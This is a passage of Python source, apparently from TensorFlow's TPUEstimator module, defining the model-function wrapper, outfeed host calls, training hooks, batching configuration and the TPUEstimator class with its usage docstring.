err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs, computation, batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = tf.nest.flatten(computation_inputs)
@tf.nondifferentiable_batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = tf.nest.pack_sequence_as(
computation_inputs, tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(tf.compat.v1.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_))
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(
scaled_gradients, tf.compat.v1.train.get_global_step())
]
stopping_signals = None
user_provided_stopping_signals_name = None
if self._ctx.feed_hook is not None:
stopping_signals, user_provided_stopping_signals_name = \
self._ctx.feed_hook.get_stopping_signals_and_name(features)
# We must run train_op to update the variables prior to running the
# outfeed.
with tf.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if stopping_signals is not None:
identity_fn = lambda **kwargs: kwargs
tracer_host_call[user_provided_stopping_signals_name] = [
identity_fn, stopping_signals
]
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update(
{'host_call': (lambda loss_t: loss_t, [tf.reshape(loss, [1])])})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with tf.control_dependencies(host_call_outfeed_ops):
return tf.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return tf.math.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, tf.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = tf.compat.v1.get_default_graph(
)._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
tf.compat.v1.logging.warn(
'EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with tf.compat.v1.device(tf.compat.v1.tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [
tf.compat.v1.cond(
tf.math.equal(
tf.math.floormod(step, self._outfeed_every_n_steps),
0), lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: tf.no_op())
]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with tf.compat.v1.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with tf.compat.v1.device(
self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with tf.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = tf.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = tf.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = tf.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(tf.compat.v1.train.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(tf.compat.v2.summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class _NotSaver(object):
"""What to pass instead of a saver object if you don't want saving."""
def __init__(self, message):
self._message = message
def save(self, *args, **kwargs):
del args, kwargs
tf.compat.v1.logging.info(self._message)
class ExamplesPerSecondHook(tf.compat.v1.train.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(
tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
tf.compat.v1.logging.info('global_step/sec: %g', global_step_per_sec)
tf.compat.v1.logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(tf.compat.v1.train.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=100):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
100.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: 1 or 2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
